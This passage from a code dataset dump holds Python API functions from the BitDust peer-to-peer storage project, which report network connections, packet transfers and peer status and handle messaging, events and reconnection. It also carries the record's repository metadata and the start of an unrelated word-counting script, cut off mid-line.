driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from p2p import p2p_stats\r\n return RESULT([{\r\n 'in': p2p_stats.counters_in(),\r\n 'out': p2p_stats.counters_out(),\r\n }])\r\n\r\n\r\ndef packets_list():\r\n \"\"\"\r\n Return list of incoming and outgoing packets.\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from transport import packet_in\r\n from transport import packet_out\r\n result = []\r\n for pkt_out in packet_out.queue():\r\n result.append({\r\n 'name': pkt_out.outpacket.Command,\r\n 'label': pkt_out.label,\r\n 'from_to': 'to',\r\n 'target': pkt_out.remote_idurl,\r\n })\r\n for pkt_in in packet_in.items().values():\r\n result.append({\r\n 'name': pkt_in.transfer_id,\r\n 'label': pkt_in.label,\r\n 'from_to': 'from',\r\n 'target': pkt_in.sender_idurl,\r\n })\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef transfers_list():\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_data_motion'):\r\n return ERROR('service_data_motion() is not started')\r\n from customer import io_throttle\r\n from userid import global_id\r\n result = []\r\n for supplier_idurl in io_throttle.throttle().ListSupplierQueues():\r\n r = {\r\n 'idurl': supplier_idurl,\r\n 'global_id': global_id.UrlToGlobalID(supplier_idurl),\r\n 'outgoing': [],\r\n 'incoming': [],\r\n }\r\n q = io_throttle.throttle().GetSupplierQueue(supplier_idurl)\r\n for packet_id in q.ListSendItems():\r\n i = q.GetSendItem(packet_id)\r\n if i:\r\n r['outgoing'].append({\r\n 'packet_id': i.packetID,\r\n 'owner_id': i.ownerID,\r\n 'remote_id': i.remoteID,\r\n 'customer': i.customerID,\r\n 'remote_path': i.remotePath,\r\n 'filename': i.fileName,\r\n 'created': i.created,\r\n 'sent': i.sendTime,\r\n })\r\n for packet_id in q.ListRequestItems():\r\n i = q.GetRequestItem(packet_id)\r\n if i:\r\n r['incoming'].append({\r\n 'packet_id': i.packetID,\r\n 'owner_id': i.ownerID,\r\n 'remote_id': i.remoteID,\r\n 'customer': i.customerID,\r\n 'remote_path': i.remotePath,\r\n 'filename': i.fileName,\r\n 'created': i.created,\r\n 'requested': i.requestTime,\r\n })\r\n result.append(r)\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef connections_list(wanted_protos=None):\r\n \"\"\"\r\n Returns list of opened/active network connections. Argument `wanted_protos`\r\n can be used to select which protocols to list:\r\n\r\n connections_list(wanted_protos=['tcp', 'udp'])\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from transport import gateway\r\n from userid import global_id\r\n result = []\r\n if not wanted_protos:\r\n wanted_protos = gateway.list_active_transports()\r\n for proto in wanted_protos:\r\n for connection in gateway.list_active_sessions(proto):\r\n item = {\r\n 'status': 'unknown',\r\n 'state': 'unknown',\r\n 'proto': proto,\r\n 'host': 'unknown',\r\n 'global_id': 'unknown',\r\n 'idurl': 'unknown',\r\n 'bytes_sent': 0,\r\n 'bytes_received': 0,\r\n }\r\n if proto == 'tcp':\r\n if hasattr(connection, 'stream'):\r\n try:\r\n host = '%s:%s' % (connection.peer_address[0], connection.peer_address[1])\r\n except:\r\n host = 'unknown'\r\n item.update({\r\n 'status': 'active',\r\n 'state': connection.state,\r\n 'host': host,\r\n 'global_id': global_id.UrlToGlobalID(connection.peer_idurl or ''),\r\n 'idurl': connection.peer_idurl or '',\r\n 'bytes_sent': connection.total_bytes_sent,\r\n 'bytes_received': connection.total_bytes_received,\r\n })\r\n else:\r\n try:\r\n host = '%s:%s' % (connection.connection_address[0], connection.connection_address[1])\r\n except:\r\n host = 'unknown'\r\n item.update({\r\n 'status': 'connecting',\r\n 'host': host,\r\n })\r\n elif proto == 'udp':\r\n try:\r\n host = '%s:%s' % (connection.peer_address[0], connection.peer_address[1])\r\n except:\r\n host = 'unknown'\r\n item.update({\r\n 'status': 'active',\r\n 'state': connection.state,\r\n 'host': host,\r\n 'global_id': global_id.UrlToGlobalID(connection.peer_idurl or ''),\r\n 'idurl': connection.peer_idurl or '',\r\n 'bytes_sent': connection.bytes_sent,\r\n 'bytes_received': connection.bytes_received,\r\n })\r\n result.append(item)\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef streams_list(wanted_protos=None):\r\n \"\"\"\r\n Return list of active sending/receiveing files.\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from transport import gateway\r\n from lib import misc\r\n result = []\r\n if not wanted_protos:\r\n wanted_protos = gateway.list_active_transports()\r\n for proto in wanted_protos:\r\n for stream in gateway.list_active_streams(proto):\r\n item = {\r\n 'proto': proto,\r\n 'stream_id': '',\r\n 'type': '',\r\n 'bytes_current': -1,\r\n 'bytes_total': -1,\r\n 'progress': '0%',\r\n }\r\n if proto == 'tcp':\r\n if hasattr(stream, 'bytes_received'):\r\n item.update({\r\n 'stream_id': stream.file_id,\r\n 'type': 'in',\r\n 'bytes_current': stream.bytes_received,\r\n 'bytes_total': stream.size,\r\n 'progress': misc.value2percent(stream.bytes_received, stream.size, 0)\r\n })\r\n elif hasattr(stream, 'bytes_sent'):\r\n item.update({\r\n 'stream_id': stream.file_id,\r\n 'type': 'out',\r\n 'bytes_current': stream.bytes_sent,\r\n 'bytes_total': stream.size,\r\n 'progress': misc.value2percent(stream.bytes_sent, stream.size, 0)\r\n })\r\n elif proto == 'udp':\r\n if hasattr(stream.consumer, 'bytes_received'):\r\n item.update({\r\n 'stream_id': stream.stream_id,\r\n 'type': 'in',\r\n 'bytes_current': stream.consumer.bytes_received,\r\n 'bytes_total': stream.consumer.size,\r\n 'progress': misc.value2percent(stream.consumer.bytes_received, stream.consumer.size, 0)\r\n })\r\n elif hasattr(stream.consumer, 'bytes_sent'):\r\n item.update({\r\n 'stream_id': stream.stream_id,\r\n 'type': 'out',\r\n 'bytes_current': stream.consumer.bytes_sent,\r\n 'bytes_total': stream.consumer.size,\r\n 'progress': misc.value2percent(stream.consumer.bytes_sent, stream.consumer.size, 0)\r\n })\r\n result.append(item)\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef queue_list():\r\n \"\"\"\r\n \"\"\"\r\n from p2p import p2p_queue\r\n return RESULT([{\r\n 'queue_id': queue_id,\r\n 'messages': len(p2p_queue.queue(queue_id)),\r\n } for queue_id in p2p_queue.queue().keys()])\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef user_ping(idurl_or_global_id, timeout=10):\r\n \"\"\"\r\n Sends Identity packet to remote peer and wait for Ack packet to check connection status.\r\n The \"ping\" command performs following actions:\r\n 1. Request remote identity source by idurl,\r\n 2. Sends my Identity to remote contact addresses, taken from identity,\r\n 3. Wait first Ack packet from remote peer,\r\n 4. Failed by timeout or identity fetching error.\r\n You can use this method to check and be sure that remote node is alive at the moment.\r\n Return:\r\n {'status': 'OK', 'result': '(signed.Packet[Ack(Identity) bob|bob for alice], in_70_19828906(DONE))'}\r\n \"\"\"\r\n if not driver.is_on('service_identity_propagate'):\r\n return ERROR('service_identity_propagate() is not started')\r\n from p2p import propagate\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n ret = Deferred()\r\n d = propagate.PingContact(idurl, int(timeout))\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(str(resp))))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n\r\ndef user_status(idurl_or_global_id):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_identity_propagate'):\r\n return ERROR('service_identity_propagate() is not started')\r\n from p2p import contact_status\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n if not contact_status.isKnown(idurl):\r\n return ERROR('unknown user')\r\n state_machine_inst = contact_status.getInstance(idurl)\r\n if not state_machine_inst:\r\n return ERROR('error fetching user status')\r\n return RESULT([{\r\n 'contact_status': contact_status.stateToLabel(state_machine_inst.state),\r\n 'contact_state': state_machine_inst.state,\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n }])\r\n\r\n\r\ndef user_status_check(idurl_or_global_id, timeout=5):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_identity_propagate'):\r\n return ERROR('service_identity_propagate() is not started')\r\n from p2p import contact_status\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n peer_status = contact_status.getInstance(idurl)\r\n if not peer_status:\r\n return ERROR('failed to check peer status')\r\n ret = Deferred()\r\n\r\n def _on_peer_status_state_changed(oldstate, newstate, event_string, args):\r\n if newstate not in ['CONNECTED', 'OFFLINE', ]:\r\n return None\r\n if newstate == 'OFFLINE' and oldstate == 'OFFLINE' and not event_string == 'ping-failed':\r\n return None\r\n ret.callback(OK(extra_fields=dict(\r\n idurl=idurl,\r\n global_id=global_id.UrlToGlobalID(idurl),\r\n contact_state=newstate,\r\n contact_status=contact_status.stateToLabel(newstate),\r\n )))\r\n return None\r\n\r\n def _do_clean(x):\r\n peer_status.removeStateChangedCallback(_on_peer_status_state_changed)\r\n return x\r\n\r\n ret.addCallback(_do_clean)\r\n\r\n peer_status.addStateChangedCallback(_on_peer_status_state_changed)\r\n peer_status.automat('ping', timeout)\r\n return ret\r\n\r\n\r\ndef user_search(nickname, attempts=1):\r\n \"\"\"\r\n Starts nickname_observer() Automat to lookup existing nickname registered\r\n in DHT network.\r\n \"\"\"\r\n from lib import misc\r\n from userid import global_id\r\n if not nickname:\r\n return ERROR('requires nickname of the user')\r\n if not misc.ValidNickName(nickname):\r\n return ERROR('invalid nickname')\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n\r\n from chat import nickname_observer\r\n # nickname_observer.stop_all()\r\n ret = Deferred()\r\n\r\n def _result(result, nik, pos, idurl):\r\n return ret.callback(RESULT([{\r\n 'result': result,\r\n 'nickname': nik,\r\n 'position': pos,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'idurl': idurl,\r\n }]))\r\n\r\n nickname_observer.find_one(\r\n nickname,\r\n attempts=attempts,\r\n results_callback=_result,\r\n )\r\n return ret\r\n\r\n\r\ndef user_observe(nickname, attempts=3):\r\n \"\"\"\r\n Starts nickname_observer() Automat to lookup existing nickname registered\r\n in DHT network.\r\n \"\"\"\r\n from lib import misc\r\n from userid import global_id\r\n if not nickname:\r\n return ERROR('requires nickname of the user')\r\n if not misc.ValidNickName(nickname):\r\n return ERROR('invalid nickname')\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n\r\n from chat import nickname_observer\r\n nickname_observer.stop_all()\r\n ret = Deferred()\r\n results = []\r\n\r\n def _result(result, nik, pos, idurl):\r\n if result != 'finished':\r\n results.append({\r\n 'result': result,\r\n 'nickname': nik,\r\n 'position': pos,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'idurl': idurl,\r\n })\r\n return None\r\n ret.callback(RESULT(results, ))\r\n return None\r\n\r\n from twisted.internet import reactor\r\n reactor.callLater(0.05, nickname_observer.observe_many,\r\n nickname,\r\n attempts=attempts,\r\n results_callback=_result,\r\n )\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef nickname_get():\r\n \"\"\"\r\n \"\"\"\r\n from main import settings\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n return OK(extra_fields={'nickname': settings.getNickName(), })\r\n\r\n\r\ndef nickname_set(nickname):\r\n \"\"\"\r\n Starts nickname_holder() machine to register and keep your nickname in DHT\r\n network.\r\n \"\"\"\r\n from lib import misc\r\n if not nickname:\r\n return ERROR('requires nickname of the user')\r\n if not misc.ValidNickName(nickname):\r\n return ERROR('invalid nickname')\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import nickname_holder\r\n from main import settings\r\n from userid import my_id\r\n settings.setNickName(nickname)\r\n ret = Deferred()\r\n\r\n def _nickname_holder_result(result, key):\r\n nickname_holder.A().remove_result_callback(_nickname_holder_result)\r\n return ret.callback(OK(extra_fields={\r\n 'result': result,\r\n 'nickname': key,\r\n 'global_id': my_id.getGlobalID(),\r\n 'idurl': my_id.getLocalID(),\r\n }))\r\n\r\n nickname_holder.A().add_result_callback(_nickname_holder_result)\r\n nickname_holder.A('set', nickname)\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef message_send(recipient, json_data, timeout=5):\r\n \"\"\"\r\n Sends a text message to remote peer, `recipient` is a string with nickname or global_id.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': ['signed.Packet[Message(146681300413)]']}\r\n \"\"\"\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import message\r\n from userid import global_id\r\n from crypt import my_keys\r\n if not recipient.count('@'):\r\n from contacts import contactsdb\r\n recipient_idurl = contactsdb.find_correspondent_by_nickname(recipient)\r\n if not recipient_idurl:\r\n return ERROR('recipient not found')\r\n recipient = global_id.UrlToGlobalID(recipient_idurl)\r\n glob_id = global_id.ParseGlobalID(recipient)\r\n if not glob_id['idurl']:\r\n return ERROR('wrong recipient')\r\n target_glob_id = global_id.MakeGlobalID(**glob_id)\r\n if not my_keys.is_valid_key_id(target_glob_id):\r\n return ERROR('invalid key_id: %s' % target_glob_id)\r\n# if not my_keys.is_key_registered(target_glob_id):\r\n# return ERROR('unknown key_id: %s' % target_glob_id)\r\n lg.out(4, 'api.message_send to \"%s\"' % target_glob_id)\r\n result = message.send_message(\r\n json_data=json_data,\r\n recipient_global_id=target_glob_id,\r\n timeout=timeout,\r\n )\r\n ret = Deferred()\r\n result.addCallback(\r\n lambda packet: ret.callback(\r\n OK(str(packet))))\r\n result.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n\r\ndef message_receive(consumer_id):\r\n \"\"\"\r\n This method can be used to listen and process incoming chat messages by specific consumer.\r\n If there are no messages received yet, this method will be waiting for any incomings.\r\n If some messages was already received, but not \"consumed\" yet method will return them imediately.\r\n After you got response and processed the messages you should call this method again to listen\r\n for more incomings again. This is simillar to message queue polling interface.\r\n If you do not \"consume\" messages, after 100 un-collected messages \"consumer\" will be dropped.\r\n Both, incoming and outgoing, messages will be populated here.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'type': 'private_message',\r\n 'dir': 'incoming',\r\n 'id': '123456788',\r\n 'sender': 'abc$alice@first-host.com',\r\n 'recipient': 'abc$bob@second-host.net',\r\n 'message': 'Hello World!',\r\n 'time': 123456789\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import message\r\n ret = Deferred()\r\n\r\n def _on_pending_messages(pending_messages):\r\n result = []\r\n for msg in pending_messages:\r\n if msg['type'] != 'private_message':\r\n continue\r\n result.append({\r\n 'data': msg['data'],\r\n 'recipient': msg['to'],\r\n 'sender': msg['from'],\r\n 'time': msg['time'],\r\n 'message_id': msg['id'],\r\n 'dir': msg['dir'],\r\n })\r\n lg.out(4, 'api.message_receive._on_pending_messages returning : %s' % result)\r\n ret.callback(OK(result))\r\n return len(result) > 0\r\n\r\n d = message.consume_messages(consumer_id)\r\n d.addCallback(_on_pending_messages)\r\n d.addErrback(lambda err: ret.callback(ERROR(str(err))))\r\n lg.out(4, 'api.message_receive \"%s\"' % consumer_id)\r\n return ret\r\n\r\n\r\ndef messages_get_all(index_name, limit, offset, with_doc, with_storage):\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import message_db\r\n r = [m for m in message_db.get_all(index_name, limit, offset, with_doc, with_storage)]\r\n return RESULT(r)\r\n\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef broadcast_send_message(payload):\r\n \"\"\"\r\n Sends broadcast message to all peers in the network.\r\n\r\n Message must be provided in `payload` argument is a Json object.\r\n\r\n WARNING! Please, do not send too often and do not send more then\r\n several kilobytes per message.\r\n \"\"\"\r\n if not driver.is_on('service_broadcasting'):\r\n return ERROR('service_broadcasting() is not started')\r\n from broadcast import broadcast_service\r\n from broadcast import broadcast_listener\r\n from broadcast import broadcaster_node\r\n msg = broadcast_service.send_broadcast_message(payload)\r\n current_states = dict()\r\n if broadcaster_node.A():\r\n current_states[broadcaster_node.A().name] = broadcaster_node.A().state\r\n if broadcast_listener.A():\r\n current_states[broadcast_listener.A().name] = broadcast_listener.A().state\r\n lg.out(4, 'api.broadcast_send_message : %s, %s' % (msg, current_states))\r\n return RESULT([msg, current_states, ])\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef event_send(event_id, json_data=None):\r\n import json\r\n from main import events\r\n json_payload = None\r\n json_length = 0\r\n if json_data and (isinstance(json_data, str) or isinstance(json_data, unicode)):\r\n json_length = len(json_data)\r\n try:\r\n json_payload = json.loads(json_data or '{}')\r\n except:\r\n return ERROR('json data payload is not correct')\r\n evt = events.send(event_id, data=json_payload)\r\n lg.out(4, 'api.event_send \"%s\" was fired to local node with %d bytes payload' % (event_id, json_length, ))\r\n return OK({'event_id': event_id, 'created': evt.created, })\r\n\r\ndef events_listen(consumer_id):\r\n from main import events\r\n ret = Deferred()\r\n\r\n def _on_pending_events(pending_events):\r\n result = []\r\n for evt in pending_events:\r\n if evt['type'] != 'event':\r\n continue\r\n result.append({\r\n 'id': evt['id'],\r\n 'data': evt['data'],\r\n 'time': evt['time'],\r\n })\r\n # lg.out(4, 'api.events_listen._on_pending_events returning : %s' % result)\r\n ret.callback(OK(result))\r\n return len(result) > 0\r\n\r\n d = events.consume_events(consumer_id)\r\n d.addCallback(_on_pending_events)\r\n d.addErrback(lambda err: ret.callback(ERROR(str(err))))\r\n # lg.out(4, 'api.events_listen \"%s\"' % consumer_id)\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef network_stun(udp_port=None, dht_port=None):\r\n \"\"\"\r\n \"\"\"\r\n from stun import stun_client\r\n ret = Deferred()\r\n d = stun_client.safe_stun(udp_port=udp_port, dht_port=dht_port)\r\n d.addBoth(lambda r: ret.callback(RESULT([r, ])))\r\n return ret\r\n\r\n\r\ndef network_reconnect():\r\n \"\"\"\r\n Sends \"reconnect\" event to network_connector() Automat in order to refresh\r\n network connection.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'reconnected'}\r\n \"\"\"\r\n if not driver.is_on('service_network'):\r\n return ERROR('service_network() is not started')\r\n from p2p import network_connector\r\n lg.out(4, 'api.network_reconnect')\r\n network_connector.A('reconnect')\r\n return OK('reconnected')\r\n\r\n\r\ndef network_connected(wait_timeout=5):\r\n \"\"\"\r\n Be sure BitDust software is connected to other nodes in the network.\r\n If all is good this method will block for `wait_timeout` seconds.\r\n In case of some network issues method will return result asap.\r\n \"\"\"\r\n if not driver.is_on('service_network'):\r\n return ERROR('service_network() is not started')\r\n from twisted.internet import reactor\r\n from userid import my_id\r\n from automats import automat\r\n ret = Deferred()\r\n\r\n p2p_connector_lookup = automat.find('p2p_connector')\r\n if p2p_connector_lookup:\r\n p2p_connector_machine = automat.objects().get(p2p_connector_lookup[0])\r\n if p2p_connector_machine and p2p_connector_machine.state == 'CONNECTED':\r\n wait_timeout_defer = Deferred()\r\n wait_timeout_defer.addTimeout(wait_timeout, clock=reactor)\r\n wait_timeout_defer.addBoth(lambda _: ret.callback(OK('connected')))\r\n return ret\r\n\r\n if not my_id.isLocalIdentityReady():\r\n lg.warn('local identity is not valid or not exist')\r\n return ERROR('local identity is not valid or not exist', extra_fields={'reason': 'identity_not_exist'})\r\n if not driver.is_enabled('service_network'):\r\n lg.warn('service_network() is disabled')\r\n return ERROR('service_network() is disabled', extra_fields={'reason': 'service_network_disabled'})\r\n if not driver.is_enabled('service_gateway'):\r\n lg.warn('service_gateway() is disabled')\r\n return ERROR('service_gateway() is disabled', extra_fields={'reason': 'service_gateway_disabled'})\r\n if not driver.is_enabled('service_p2p_hookups'):\r\n lg.warn('service_p2p_hookups() is disabled')\r\n return ERROR('service_p2p_hookups() is disabled', extra_fields={'reason': 'service_p2p_hookups_disabled'})\r\n\r\n def _do_p2p_connector_test():\r\n try:\r\n p2p_connector_lookup = automat.find('p2p_connector')\r\n if not p2p_connector_lookup:\r\n lg.warn('disconnected, reason is \"p2p_connector_not_found\"')\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_not_found'}))\r\n return None\r\n p2p_connector_machine = automat.objects().get(p2p_connector_lookup[0])\r\n if not p2p_connector_machine:\r\n lg.warn('disconnected, reason is \"p2p_connector_not_exist\"')\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_not_exist'}))\r\n return None\r\n if p2p_connector_machine.state != 'CONNECTED':\r\n lg.warn('disconnected, reason is \"p2p_connector_disconnected\", sending \"check-synchronize\" event to p2p_connector()')\r\n p2p_connector_machine.automat('check-synchronize')\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_disconnected'}))\r\n return None\r\n ret.callback(OK('connected'))\r\n except:\r\n lg.exc()\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_error'}))\r\n return None\r\n\r\n def _on_service_restarted(resp, service_name):\r\n if service_name == 'service_network':\r\n _do_service_test('service_gateway')\r\n elif service_name == 'service_gateway':\r\n _do_service_test('service_p2p_hookups')\r\n else:\r\n _do_p2p_connector_test()\r\n return resp\r\n\r\n def _do_service_restart(service_name):\r\n d = service_restart(service_name, wait_timeout=wait_timeout)\r\n d.addCallback(_on_service_restarted, service_name)\r\n d.addErrback(lambda err: ret.callback(dict(\r\n ERROR(err.getErrorMessage()).items() + {'reason': '{}_restart_error'.format(service_name)}.items())))\r\n return None\r\n\r\n def _do_service_test(service_name):\r\n try:\r\n svc_info = service_info(service_name)\r\n svc_state = svc_info['result'][0]['state']\r\n except:\r\n lg.exc()\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': '{}_info_error'.format(service_name)}))\r\n return None\r\n if svc_state != 'ON':\r\n _do_service_restart(service_name)\r\n return None\r\n if service_name == 'service_network':\r\n reactor.callLater(0, _do_service_test, 'service_gateway')\r\n elif service_name == 'service_gateway':\r\n reactor.callLater(0, _do_service_test, 'service_p2p_hookups')\r\n else:\r\n reactor.callLater(0, _do_p2p_connector_test)\r\n return None\r\n\r\n _do_service_test('service_network')\r\n return ret\r\n\r\n\r\ndef network_status(show_suppliers=True, show_customers=True, show_cache=True,\r\n show_tcp=True, show_udp=True, show_proxy=True, ):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_network'):\r\n return ERROR('service_network() is not started')\r\n from automats import automat\r\n from main import settings\r\n from userid import my_id\r\n from userid import global_id\r\n\r\n def _tupl_addr_to_str(addr):\r\n if not addr:\r\n return None\r\n return ':'.join(map(str, addr))\r\n\r\n r = {\r\n 'p2p_connector_state': None,\r\n 'network_connector_state': None,\r\n 'idurl': None,\r\n 'global_id': None,\r\n }\r\n p2p_connector_lookup = automat.find('p2p_connector')\r\n if p2p_connector_lookup:\r\n p2p_connector_machine = automat.objects().get(p2p_connector_lookup[0])\r\n if p2p_connector_machine:\r\n r['p2p_connector_state'] = p2p_connector_machine.state\r\n network_connector_lookup = automat.find('network_connector')\r\n if network_connector_lookup:\r\n network_connector_machine = automat.objects().get(network_connector_lookup[0])\r\n if network_connector_machine:\r\n r['network_connector_state'] = network_connector_machine.state\r\n if my_id.isLocalIdentityReady():\r\n r['idurl'] = my_id.getLocalID()\r\n r['global_id'] = my_id.getGlobalID()\r\n if True in [show_suppliers, show_customers, show_cache, ]:\r\n if not driver.is_on('service_p2p_hookups'):\r\n return ERROR('service_p2p_hookups() is not started')\r\n from contacts import contactsdb\r\n from p2p import contact_status\r\n if show_suppliers:\r\n connected = 0\r\n items = []\r\n for idurl in contactsdb.all_suppliers():\r\n i = {\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'state': None\r\n }\r\n inst = contact_status.getInstance(idurl)\r\n if inst:\r\n i['state'] = inst.state\r\n if inst.state == 'CONNECTED':\r\n connected += 1\r\n items.append(i)\r\n r['suppliers'] = {\r\n 'desired': settings.getSuppliersNumberDesired(),\r\n 'requested': contactsdb.num_suppliers(),\r\n 'connected': connected,\r\n 'total': contactsdb.total_suppliers(),\r\n 'peers': items,\r\n }\r\n if show_customers:\r\n connected = 0\r\n items = []\r\n for idurl in contactsdb.customers():\r\n i = {\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'state': None\r\n }\r\n inst = contact_status.getInstance(idurl)\r\n if inst:\r\n i['state'] = inst.state\r\n if inst.state == 'CONNECTED':\r\n connected += 1\r\n items.append(i)\r\n r['customers'] = {\r\n 'connected': connected,\r\n 'total': contactsdb.num_customers(),\r\n 'peers': items,\r\n }\r\n if show_cache:\r\n from contacts import identitycache\r\n connected = 0\r\n items = []\r\n for idurl in identitycache.Items().keys():\r\n i = {\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'state': None\r\n }\r\n inst = contact_status.getInstance(idurl)\r\n if inst:\r\n i['state'] = inst.state\r\n if inst.state == 'CONNECTED':\r\n connected += 1\r\n items.append(i)\r\n r['cache'] = {\r\n 'total': identitycache.CacheLen(),\r\n 'connected': connected,\r\n 'peers': items,\r\n }\r\n if True in [show_tcp, show_udp, show_proxy, ]:\r\n from transport import gateway\r\n if show_tcp:\r\n r['tcp'] = {\r\n 'sessions': [],\r\n 'streams': [],\r\n }\r\n if driver.is_on('service_tcp_transport'):\r\n sessions = []\r\n for s in gateway.list_active_sessions('tcp'):\r\n i = {\r\n 'peer': getattr(s, 'peer', None),\r\n 'state': getattr(s, 'state', None),\r\n 'id': getattr(s, 'id', None),\r\n 'idurl': getattr(s, 'peer_idurl', None),\r\n 'address': _tupl_addr_to_str(getattr(s, 'peer_address', None)),\r\n 'external_address': _tupl_addr_to_str(getattr(s, 'peer_external_address', None)),\r\n 'connection_address': _tupl_addr_to_str(getattr(s, 'connection_address', None)),\r\n 'bytes_received': getattr(s, 'total_bytes_received', 0),\r\n 'bytes_sent': getattr(s, 'total_bytes_sent', 0),\r\n }\r\n sessions.append(i)\r\n streams = []\r\n for s in gateway.list_active_streams('tcp'):\r\n i = {\r\n 'started': s.started,\r\n 'stream_id': s.file_id,\r\n 'transfer_id': s.transfer_id,\r\n 'size': s.size,\r\n 'type': s.typ,\r\n }\r\n streams.append(i)\r\n r['tcp']['sessions'] = sessions\r\n r['tcp']['streams'] = streams\r\n if show_udp:\r\n r['udp'] = {\r\n 'sessions': [],\r\n 'streams': [],\r\n }\r\n if driver.is_on('service_udp_transport'):\r\n sessions = []\r\n for s in gateway.list_active_sessions('udp'):\r\n sessions.append({\r\n 'peer': s.peer_id,\r\n 'state': s.state,\r\n 'id': s.id,\r\n 'idurl': s.peer_idurl,\r\n 'address': _tupl_addr_to_str(s.peer_address),\r\n 'bytes_received': s.bytes_sent,\r\n 'bytes_sent': s.bytes_received,\r\n 'outgoing': len(s.file_queue.outboxFiles),\r\n 'incoming': len(s.file_queue.inboxFiles),\r\n 'queue': len(s.file_queue.outboxQueue),\r\n 'dead_streams': len(s.file_queue.dead_streams),\r\n })\r\n streams = []\r\n for s in gateway.list_active_streams('udp'):\r\n streams.append({\r\n 'started': s.started,\r\n 'stream_id': s.stream_id,\r\n 'transfer_id': s.transfer_id,\r\n 'size': s.size,\r\n 'type': s.typ,\r\n })\r\n r['udp']['sessions'] = sessions\r\n r['udp']['streams'] = streams\r\n if show_proxy:\r\n r['proxy'] = {\r\n 'sessions': [],\r\n }\r\n if driver.is_on('service_proxy_transport'):\r\n sessions = []\r\n for s in gateway.list_active_sessions('proxy'):\r\n i = {\r\n 'state': s.state,\r\n 'id': s.id,\r\n }\r\n if getattr(s, 'router_proto_host', None):\r\n i['proto'] = s.router_proto_host[0]\r\n i['peer'] = s.router_proto_host[1]\r\n if getattr(s, 'router_idurl', None):\r\n i['idurl'] = s.router_idurl\r\n i['router'] = global_id.UrlToGlobalID(s.router_idurl)\r\n if getattr(s, 'traffic_out', None):\r\n i['bytes_sent'] = s.traffic_out\r\n if getattr(s, 'traffic_in', None):\r\n i['bytes_received'] = s.traffic_in\r\n if getattr(s, 'pending_packets', None):\r\n i['queue'] = len(s.pending_packets)\r\n sessions.append(i)\r\n r['proxy']['sessions' ] = sessions\r\n return RESULT([r, ])\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef pdb_shell():\r\n import pdb; pdb.set_trace()\r\n return OK()\r\n\r\n#------------------------------------------------------------------------------","repo_name":"vesellov/bitdust.public.old","sub_path":"interface/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":128652,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"86"} +{"seq_id":"12650996979","text":"from collections import Counter\r\n\r\nwith open(\"dataset/clean_positive_sentences.txt\", encoding=\"utf-8\") as f:\r\n content = f.readlines()\r\ncontent = [x.strip() for x in content]\r\n\r\nwordlist = []\r\nfor line in content:\r\n wordlist += line.split()\r\n\r\nwords = dict(Counter(wordlist))\r\nwords = dict(sorted(words.items(), key=lambda x:x))\r\n\r\nf = 